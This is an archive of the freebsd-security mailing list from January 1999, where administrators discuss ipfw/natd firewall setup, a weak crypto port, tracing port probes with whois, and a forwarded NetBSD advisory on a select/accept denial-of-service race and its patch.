Mail-Followup-To: Tomaz Borstnar , freebsd-security@FreeBSD.ORG References: <19990117194706.H97318@oreo.adsu.bellsouth.com> <007701be4256$f01ff740$02c3fe90@cisco.com> <19990117185047.A97318@oreo.adsu.bellsouth.com> <199901180030.QAA54407@apollo.backplane.com> <19990117194706.H97318@oreo.adsu.bellsouth.com> <199901181511.IAA26164@mt.sri.com> <4.1.19990119010408.02c0d7d0@195.250.206.101> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.94.17i In-Reply-To: <4.1.19990119010408.02c0d7d0@195.250.206.101>; from Tomaz Borstnar on Tue, Jan 19, 1999 at 01:06:32AM +0100 X-Operating-System: FreeBSD 2.2.8-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jan 19, 1999 at 01:06:32AM +0100, Tomaz Borstnar wrote: > > Would some kind soul provide ipfw filters for icmp with some comments so > people can copy them and enable only what they think is useful/needed for > them? I'm sure something like this would be good - probably also good for > handbook. > http://www.worldgate.com/~marcs/mtu/ Regards, -- Ruslan Ermilov Sysadmin and DBA of the ru@ucb.crimea.ua United Commercial Bank +380.652.247.647 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 19 13:39:01 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA10525 for freebsd-security-outgoing; Tue, 19 Jan 1999 13:39:01 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from wanadoo.fr (smtp-out-001.wanadoo.fr [193.252.19.68]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA10520 for ; Tue, 19 Jan 1999 13:38:58 -0800 (PST) (envelope-from stephane@wanadoo.fr) Received: from nev1-59.abo.wanadoo.fr [193.252.144.59] by wanadoo.fr for Paris Tue, 19 Jan 1999 22:36:25 +0100 (MET) Received: (from stephane@localhost) by sequoia.mondomaineamoi.megalo (8.9.2/8.9.1) id VAA01249; Mon, 18 Jan 1999 21:27:08 +0100 (CET) (envelope-from stephane) Date: Mon, 18 Jan 1999 21:27:08 +0100 (CET) Message-Id: <199901182027.VAA01249@sequoia.mondomaineamoi.megalo> From: Stephane Legrand MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Christopher Nielsen Cc: freebsd-security@FreeBSD.ORG Subject: Re: Port of 'bugs' in ports tree In-Reply-To: References: X-Mailer: VM 6.34 under 20.3 "Vatican City" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Christopher Nielsen writes: > Poking around in the ports tree this morning, I noticed a port under > ports/security called bugs. It caught my attention because pkg/DESCR says > it's a crypto library. Having never heard of it, I decided to take a look > at it. > > After perusing the code and reading through the description of the > algorithm, I feel very strongly that a warning of some kind should be > placed on this piece of software. This is NOT secure in any sense of the > word (except possibly against little sisters/brothers). I can think of at > least one cryptanalysis attack off the top of my head (poor source of > random data), and that's after spending 10 minutes looking at the code and > reading the algorithm. > > Comments? > Did you try to contact the original author to discuss about this problem with him ? -- Stephane.Legrand@wanadoo.fr | FreeBSD Francophone http://perso.wanadoo.fr/stephane.legrand/ | http://www.freebsd-fr.org/ "Laissez les developpeurs developpes et les octets seront bien gardes" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 19 23:06:48 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA14816 for freebsd-security-outgoing; Tue, 19 Jan 1999 23:06:48 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA14800 for ; Tue, 19 Jan 1999 23:06:27 -0800 (PST) (envelope-from kiril@idea.co.uk) Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id HAA26541 for freebsd-security@freebsd.org; Wed, 20 Jan 1999 07:03:59 GMT From: Kiril Mitev Message-Id: <199901200703.HAA26541@idea.co.uk> Subject: optimal fwall/proxy cfg for www ? To: freebsd-security@FreeBSD.ORG Date: Wed, 20 Jan 1999 07:03:58 +0000 (GMT) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I wonder if anyone can suggest what are the tradeoffs between those two scenarios, assuming a non-forwarding gateway or firewall: 1. run squid on the firewall. this i am quite sure is the faster option both to configure & run 2. run squid outside of the firewall and (say) FWTK's http proxy on the firewall, or 3. run squid inside the firewall, with the same http proxy on the f/wall. comments/ideas/flames, please... Kiril To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 20 10:53:43 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA03330 for freebsd-security-outgoing; Wed, 20 Jan 1999 10:53:43 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from megaweapon.zigg.com (megaweapon.zigg.com [206.114.60.8]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA03317 for ; Wed, 20 Jan 1999 10:53:35 -0800 (PST) (envelope-from matt@zigg.com) Received: from localhost (matt@localhost) by megaweapon.zigg.com (8.9.2/8.9.2) with ESMTP id NAA37901 for ; Wed, 20 Jan 1999 13:49:58 -0500 (EST) (envelope-from matt@zigg.com) Date: Wed, 20 Jan 1999 13:49:57 -0500 (EST) From: Matt Behrens To: security@FreeBSD.ORG Subject: NetBSD Security Advisory 1999-001: select(2)/accept(2) race condition in TCP servers (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does this affect us, and is a similar patch planned? (Sorry, I haven't the talent.) :) - Matt Behrens Network Administrator, zigg.com Engineer, Nameless IRC Network ---------- Forwarded message ---------- Date: Wed, 20 Jan 1999 20:53:52 +1100 From: Luke Mewburn To: BUGTRAQ@netspace.org Subject: NetBSD Security Advisory 1999-001: select(2)/accept(2) race condition in TCP servers ------- Blind-Carbon-Copy From: Luke Mewburn Reply-to: lukem@netbsd.org To: netbsd-announce@netbsd.org Subject: NetBSD Security Advisory 1999-001: select(2)/accept(2) race condition in TCP servers Date: Wed, 20 Jan 1999 20:53:52 +1100 Sender: lukem@goanna.cs.rmit.edu.au - -----BEGIN PGP SIGNED MESSAGE----- NetBSD Security Advisory 1999-001 --------------------------------- Topic: select(2)/accept(2) race condition in TCP servers Version: All current versions of NetBSD Severity: Problem may allow denial of service. Abstract ======== A problem has been identified which allows remote attackers to wedge many TCP services running on 4.4BSD-derived systems, including X servers and all services run from inetd. Other (non-BSD) systems are believed to be affected as well. Technical Details ================= Many TCP servers open a TCP socket in the default blocking mode, use select(2) to wait for connections, and then accept(2) connections in blocking mode. Under some circumstances, the accept(2) may hang waiting for another connection, denying service to clients trying to connect to other ports. The scenario which causes this is: * Connection is initiated by client; 3WHS completes. * Server process is awakened and select(2) succeeds. * Connection is closed by client (e.g. by sending a RST). Connection is removed from accept(2) queue on server. * Server process does an accept(2), which hangs waiting for a connection. This scenario is sometimes difficult to reproduce, particularly if the server is very fast and the network is relatively slow. It is most effective if the server is slow and/or must do a lot of work between the select(2) and accept(2). Solutions and Workarounds ========================= Two solutions are possible: 1) Modify all TCP servers to use non-blocking listening sockets. Unfortunately, this requires changing a large amount of code, much of it maintained by third parties. 2) Modify the kernel to not remove sockets from the accept(2) queue when they are closed. A change that implements this has been added to NetBSD-current, and is available at: ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990120-accept Thanks To ========= Thanks go to Fyodor for providing nmap, with which this vulnerability was discovered. See http://www.insecure.org/nmap/ for more information. Thanks to Charles M. Hannum for providing the solution. More Information ================ Information about NetBSD and NetBSD security can be found at http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/. Copyright 1999, The NetBSD Foundation. All Rights Reserved. - -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNqWj/D5Ru2/4N2IFAQF3AwP7B/sbL1Ar8NCP/vLIaeYq698bSR2SIQRC 21yFSNY7h0qGxpsEtJ0132wIHVYp4Ho3Pbd1308ZOykx22zfZr11IlkgInW8kFKf 7K2yQOc47RAKxyaAZvgR/oqUCQE+FiZ4DYv4WDjkbUluYpcxnHmbhO/tIqbYHJqE ue/dnlXwvcA= =GHyB - -----END PGP SIGNATURE----- ------- End of Blind-Carbon-Copy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 20 16:10:11 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA07280 for freebsd-security-outgoing; Wed, 20 Jan 1999 16:10:11 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id QAA07154; Wed, 20 Jan 1999 16:09:54 -0800 (PST) (envelope-from grios@netshell.vicosa.com.br) Received: from netshell.vicosa.com.br [200.236.148.196] by guepardo.vicosa.com.br with ESMTP (SMTPD32-4.03) id A276103A0080; Wed, 20 Jan 1999 21:19:02 +03d00 Message-ID: <36A66FAC.8927207@netshell.vicosa.com.br> Date: Wed, 20 Jan 1999 22:07:08 -0200 From: Gustavo Vieira G C Rios X-Mailer: Mozilla 4.5 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: BSD-Stable , BSD-Security Subject: Security Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear Gentleman, i am running FreeBSD 2.2.8-Stable! i would like to know where can i get a list containning all Security Bug with Bug Fixes! i need this too much once my job is a critical and i am supposed to make a high security system. I would appreciate any help. Thank you for your time and cooperation. Best regards To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 20 16:54:51 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA13328 for freebsd-security-outgoing; Wed, 20 Jan 1999 16:54:51 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA13323; Wed, 20 Jan 1999 16:54:49 -0800 (PST) (envelope-from danderse@cs.utah.edu) Received: from torrey.cs.utah.edu (torrey.cs.utah.edu [155.99.212.91]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id RAA20650; Wed, 20 Jan 1999 17:54:40 -0700 (MST) Received: (from danderse@localhost) by torrey.cs.utah.edu (8.9.1/8.9.1) id RAA85647; Wed, 20 Jan 1999 17:54:39 -0700 (MST) (envelope-from danderse@cs.utah.edu) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Wed, 20 Jan 1999 17:54:39 -0700 (MST) From: "David G. Andersen" To: Gustavo Vieira G C Rios Cc: BSD-Stable , BSD-Security Subject: Re: Security In-Reply-To: Gustavo Vieira G C Rios's message of Wed, January 20 1999 <36A66FAC.8927207@netshell.vicosa.com.br> References: <36A66FAC.8927207@netshell.vicosa.com.br> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <13990.31322.214055.498707@torrey.cs.utah.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories has the list of FreeBSD security advisories. Note that that won't guarantee you a "high security" system; to do so, you'll also want to do other things to your system (disabling unnecessary services, setuid programs, etc). Discussions about this can be found in the archives of this list and others (such as bugtraq). There exist some utilities to help you manage setuid programs as well. Please followup all replies to -security. -Dave Lo and Behold, Gustavo Vieira G C Rios said: > Dear Gentleman, > > i am running FreeBSD 2.2.8-Stable! > i would like to know where can i get a list containning all Security Bug > with Bug Fixes! > i need this too much once my job is a critical and i am supposed to make > a high security system. > > I would appreciate any help. > > Thank you for your time and cooperation. > Best regards > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- work: danderse@cs.utah.edu me: angio@pobox.com University of Utah http://www.angio.net/ Computer Science - Flux Research Group To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 21 00:41:33 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA04640 for freebsd-security-outgoing; Thu, 21 Jan 1999 00:41:33 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from elmls02.ce.mediaone.net (elmls02.ce.mediaone.net [24.131.128.27]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA04633 for ; Thu, 21 Jan 1999 00:41:30 -0800 (PST) (envelope-from anthony@enteract.com) Received: from enteract.com (d152-173.ce.mediaone.net [24.131.152.173]) by elmls02.ce.mediaone.net (8.8.7/8.8.7) with ESMTP id CAA10575 for ; Thu, 21 Jan 1999 02:41:21 -0600 (CST) Message-ID: <36A6E700.CEC5418C@enteract.com> Date: Thu, 21 Jan 1999 02:36:16 -0600 From: Anthony Kim Organization: deus ex machina X-Mailer: Mozilla 4.5 [en] (Win98; U) X-Accept-Language: zh-TW,en MIME-Version: 1.0 To: "security@FreeBSD.ORG" Subject: TCP port question IPFW Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm sort of annoyed...there is some IP who is constantly filling up my ipfw logs with TCP port 1719 attempts daily. The hours are late in the evening until around 2am, then it begins again shortly after 6pm (he or she must have come home from work and felt like bugging me). More recently I see requests for TCP port 1106 in my logs as well from them. A quick search on the web showed 1719 was h323gatestat. Can someone tell me what that is? I didn't find anything on TCP port 1106 either. Any info is greatly appreciated. Also, anyway I can track this person down? traceroute works but no hostname returns. Sorry if this isn't the correct forum. -- SYSADMIN(1) sysadmin takes care of everything, is generally harangued, must be supplied with coffee, chocolate, and alcohol in order to function properly, cannot be exposed to direct sunlight, and must not be allowed to have a life. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 21 00:56:23 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA06345 for freebsd-security-outgoing; Thu, 21 Jan 1999 00:56:23 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA06334; Thu, 21 Jan 1999 00:56:20 -0800 (PST) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id JAA11292; Thu, 21 Jan 1999 09:56:09 +0100 (CET) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id JAA70055; Thu, 21 Jan 1999 09:56:07 +0100 (MET) Date: Thu, 21 Jan 1999 09:56:07 +0100 From: Eivind Eklund To: Gustavo Vieira G C Rios Cc: BSD-Security Subject: Re: Security Message-ID: <19990121095606.E65259@bitbox.follo.net> References: <36A66FAC.8927207@netshell.vicosa.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <36A66FAC.8927207@netshell.vicosa.com.br>; from Gustavo Vieira G C Rios on Wed, Jan 20, 1999 at 10:07:08PM -0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Discussion moved to only security. On Wed, Jan 20, 1999 at 10:07:08PM -0200, Gustavo Vieira G C Rios wrote: > Dear Gentleman, > > i am running FreeBSD 2.2.8-Stable! > i would like to know where can i get a list containning all Security Bug > with Bug Fixes! All security fixes are committed to the source tree; if you really are on -stable (the latest version along RELENG_2_2, at the moment), you should have them all. The only 100% reliable way to find out what has been fixed is 'cvs diff'. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 21 03:09:48 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA19896 for freebsd-security-outgoing; Thu, 21 Jan 1999 03:09:48 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (p15-max3.wlg.ihug.co.nz [209.79.142.79]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA19888 for ; Thu, 21 Jan 1999 03:09:43 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with ESMTP id AAA09563; Fri, 22 Jan 1999 00:08:31 +1300 (NZDT) (envelope-from andrew@squiz.co.nz) Date: Fri, 22 Jan 1999 00:08:17 +1300 (NZDT) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Anthony Kim cc: "security@FreeBSD.ORG" Subject: Re: TCP port question IPFW In-Reply-To: <36A6E700.CEC5418C@enteract.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I'm sort of annoyed...there is some IP who is constantly filling up my > ipfw logs with TCP port 1719 attempts daily. The hours are late in the If you're annoyed by the log entries, but not concerned by them, then don't log entries from their IP to that port. Among other things, this sort of practice makes it more likely you'll see important log info. Logging too much is a bad thing. OTOH, it can clutter your firewall ruleset. > evening until around 2am, then it begins again shortly after 6pm (he or > she must have come home from work and felt like bugging me). More > recently I see requests for TCP port 1106 in my logs as well from them. > A quick search on the web showed 1719 was h323gatestat. Can someone tell > me what that is? I didn't find anything on TCP port 1106 either. Any > info is greatly appreciated. Also, anyway I can track this person down? > traceroute works but no hostname returns. You might be able to identify their service provider from other entries in the traceroute. Also, doing a reverse lookup on other IP's in the same class C network often clarifies who owns the network. It's often possible to connect to services like telnet, smtp, ftp and get a machine name. This basically ammounts to a localised port scan. It's easily justified, but I wonder if people ever get into trouble with their ISP's as a result of it. Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 21 03:53:08 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA24607 for freebsd-security-outgoing; Thu, 21 Jan 1999 03:53:08 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA24602 for ; Thu, 21 Jan 1999 03:53:06 -0800 (PST) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id IAA00455; Thu, 21 Jan 1999 08:51:44 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199901211151.IAA00455@ns1.sminter.com.ar> Subject: Re: TCP port question IPFW In-Reply-To: <36A6E700.CEC5418C@enteract.com> from Anthony Kim at "Jan 21, 99 02:36:16 am" To: anthony@enteract.com (Anthony Kim) Date: Thu, 21 Jan 1999 08:51:44 -0300 (GMT) Cc: security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Anthony Kim escribió: > I'm sort of annoyed...there is some IP who is constantly filling up my > ipfw logs with TCP port 1719 attempts daily. The hours are late in the > evening until around 2am, then it begins again shortly after 6pm (he or > she must have come home from work and felt like bugging me). More > recently I see requests for TCP port 1106 in my logs as well from them. > A quick search on the web showed 1719 was h323gatestat. Can someone tell > me what that is? I didn't find anything on TCP port 1106 either. Any > info is greatly appreciated. Also, anyway I can track this person down? > traceroute works but no hostname returns. whois -h whois.arin.net This should return data about the ISP, and then you can contact the sysadmin there. Regards and good luck! Fernando P. Schapachnik Administracion de la red VIA Net Works Argentina SA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 21 05:54:46 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA06850 for freebsd-security-outgoing; Thu, 21 Jan 1999 05:54:46 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gotlib.galea.com (mail.galea.com [205.237.227.60]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id FAA06845 for ; Thu, 21 Jan 1999 05:54:42 -0800 (PST) (envelope-from jleclerc@galea.com) From: jleclerc@galea.com Received: by gotlib.galea.com(Lotus SMTP MTA SMTP v4.6 (462.2 9-3-1997)) id 85256700.004C5078 ; Thu, 21 Jan 1999 08:53:33 -0500 X-Lotus-FromDomain: GALEA To: security@FreeBSD.ORG Message-ID: <85256700.004C3A13.00@gotlib.galea.com> Date: Thu, 21 Jan 1999 08:53:28 -0500 Subject: Re: TCP port question IPFW Mime-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org h323gatestat come from a videoconference, like NetMeeting. /JOel Anthony Kim on 99/01/21 03:36:16 To: "security@FreeBSD.ORG" cc: (bcc: Joel Leclerc/Galea) Subject: TCP port question IPFW I'm sort of annoyed...there is some IP who is constantly filling up my ipfw logs with TCP port 1719 attempts daily. The hours are late in the evening until around 2am, then it begins again shortly after 6pm (he or she must have come home from work and felt like bugging me). More recently I see requests for TCP port 1106 in my logs as well from them. A quick search on the web showed 1719 was h323gatestat. Can someone tell me what that is? I didn't find anything on TCP port 1106 either. Any info is greatly appreciated. Also, anyway I can track this person down? traceroute works but no hostname returns. Sorry if this isn't the correct forum. -- SYSADMIN(1) sysadmin takes care of everything, is generally harangued, must be supplied with coffee, chocolate, and alcohol in order to function properly, cannot be exposed to direct sunlight, and must not be allowed to have a life. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 21 07:13:53 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA13905 for freebsd-security-outgoing; Thu, 21 Jan 1999 07:13:53 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from pmpro.com (dyn001129.belt.digex.net [199.125.237.113]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id HAA13888 for ; Thu, 21 Jan 1999 07:13:41 -0800 (PST) (envelope-from thomas@pmpro.com) Received: from squash.pmpro.com (squash.pmpro.com [192.168.201.254]) by pmpro.com (8.6.13/8.6.12) with SMTP id KAA07767 for ; Thu, 21 Jan 1999 10:10:55 -0500 Message-Id: <3.0.6.32.19990121100844.007c8ba0@pmpro.com> X-Sender: thomas@pmpro.com X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32) Date: Thu, 21 Jan 1999 10:08:44 -0500 To: freebsd-security@FreeBSD.ORG From: Mark Thomas Subject: ipfw/natd configuration Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, I'm in the process of setting up a firewall using ipfw and natd. My intention is to use a FreeBSD (soon to be 3.0-stable) machine with three interfaces. IP addresses altered. fxp0 - Interface to private network (192.168.1.1/16). fxp1 - Interface to the world (555.12.12.230/29). fxp2 - Interface to visible machines (555.12.12.233/29). The public machine is: 555.12.12.234/29 I'm a bit confused about setting up natd/ipfw. Here's where I am right now: Custom kernel with IPFIREWALL and IPDIVERT enabled. In rc.conf: gateway_enable="YES" firewall_enable="YES" firewall_type="/etc/firewall.rules" # My own rule set will be applied firewall_quiet="NO" natd_enable="YES" natd_interface="fxp1" natd_flags="-f /etc/natd.rules" network_interfaces="fxp0 fxp1 fxp2 lo0" # Does order matter? gateway_enable="YES" In /etc/services: natd 8668/divert The above combination should also add the ipfw rule to divert packets to natd correctly via rc.firewall, right? First problem is setting up the actual natd rules. To allow the public machine to be seen, it would appear I need this to pass its address unchanged: redirect_address 555.12.12.234 555.12.12.234 Since all other internal addresses are unregistered, it would then appear that this would do the trick: unregistered_only yes This leaves the firewall's own public address visible, reveals the public machine behind the wall, and remaps all private network addresses to that of the firewall, right? Now for ipfw. My fundamental confusion is ipfw's idea of exactly where 'it' is, and of in vs. out. How does the natd interface specification affect this, or does it? Do the following seem like reasonable example rules (obviously a subset of actual rules): Allow http connections from the world to 555.12.12.234 port 80: add 500 allow tcp from any to 555.12.12.234 80 in via fxp1 add 501 allow tcp from 555.12.12.234 80 to any out via fxp1 established Allow http connections from the private network to the world: add 525 allow tcp from 555.12.12.230 to any 80 out via fxp1 add 526 allow tcp from any 80 to any in via fxp1 established Allow http connections from the private network to the public machine: add 550 allow tcp from any to 555.12.12.234 80 in via fxp0 add 551 allow tcp from 555.12.12.234 80 to any out via fxp0 established Any pointers or comments appreciated. Thanks, ----- Mark Mark Thomas -- pmpro, inc. -- thomas@pmpro.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 21 09:09:07 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA27614 for freebsd-security-outgoing; Thu, 21 Jan 1999 09:09:07 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from java.dpcsys.com (java.dpcsys.com [206.16.184.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA27607 for ; Thu, 21 Jan 1999 09:09:06 -0800 (PST) (envelope-from dan@dpcsys.com) Received: from localhost (dan@localhost) by java.dpcsys.com (8.9.1a/8.9.1) with SMTP id JAA18372; Thu, 21 Jan 1999 09:09:10 -0800 (PST) Date: Thu, 21 Jan 1999 09:09:10 -0800 (PST) From: Dan Busarow To: Mark Thomas cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw/natd configuration In-Reply-To: <3.0.6.32.19990121100844.007c8ba0@pmpro.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 21 Jan 1999, Mark Thomas wrote: > I'm in the process of setting up a firewall using ipfw and natd. My > intention is to use a FreeBSD (soon to be 3.0-stable) machine with three > interfaces. IP addresses altered. > > fxp0 - Interface to private network (192.168.1.1/16). > fxp1 - Interface to the world (555.12.12.230/29). > fxp2 - Interface to visible machines (555.12.12.233/29). > > The public machine is: 555.12.12.234/29 > > I'm a bit confused about setting up natd/ipfw. Here's where I am right now: > > Custom kernel with IPFIREWALL and IPDIVERT enabled. > > In rc.conf: > > gateway_enable="YES" > firewall_enable="YES" > firewall_type="/etc/firewall.rules" # My own rule set will be applied I suspect fixing the above line will clear up a lot of your confusion. This is not the name of a rule file, it is a label withing /etc/rc.firewall i.e., "SIMPLE" > firewall_quiet="NO" > natd_enable="YES" > natd_interface="fxp1" > natd_flags="-f /etc/natd.rules" Try natd_flags="-s -m -u" > network_interfaces="fxp0 fxp1 fxp2 lo0" # Does order matter? > gateway_enable="YES" > > In /etc/services: > > natd 8668/divert > > The above combination should also add the ipfw rule to divert packets to > natd correctly via rc.firewall, right? No. You need to specify a divert rule. See the example /etc/rc.firewall > First problem is setting up the actual natd rules. To allow the public > machine to be seen, it would appear I need this to pass its address > unchanged: > > redirect_address 555.12.12.234 555.12.12.234 > > Since all other internal addresses are unregistered, it would then appear > that this would do the trick: > > unregistered_only yes You don't need redirect_address, unregistered_only (-u in my flags) does what it says. Only RFC1918 addresses will be NAT'd. > Now for ipfw. My fundamental confusion is ipfw's idea of exactly where 'it' > is, and of in vs. out. How does the natd interface specification affect > this, or does it? Read the comments in /etc/rc.firewall Dan -- Dan Busarow 949 443 4172 Dana Point Communications, Inc. dan@dpcsys.com Dana Point, California 83 09 EF 59 E0 11 89 B4 8D 09 DB FD E1 DD 0C 82 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 21 10:42:19 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA10381 for freebsd-security-outgoing; Thu, 21 Jan 1999 10:42:19 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from elmls02.ce.mediaone.net (elmls02.ce.mediaone.net [24.131.128.27]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA10376 for ; Thu, 21 Jan 1999 10:42:17 -0800 (PST) (envelope-from anthony@enteract.com) Received: from enteract.com 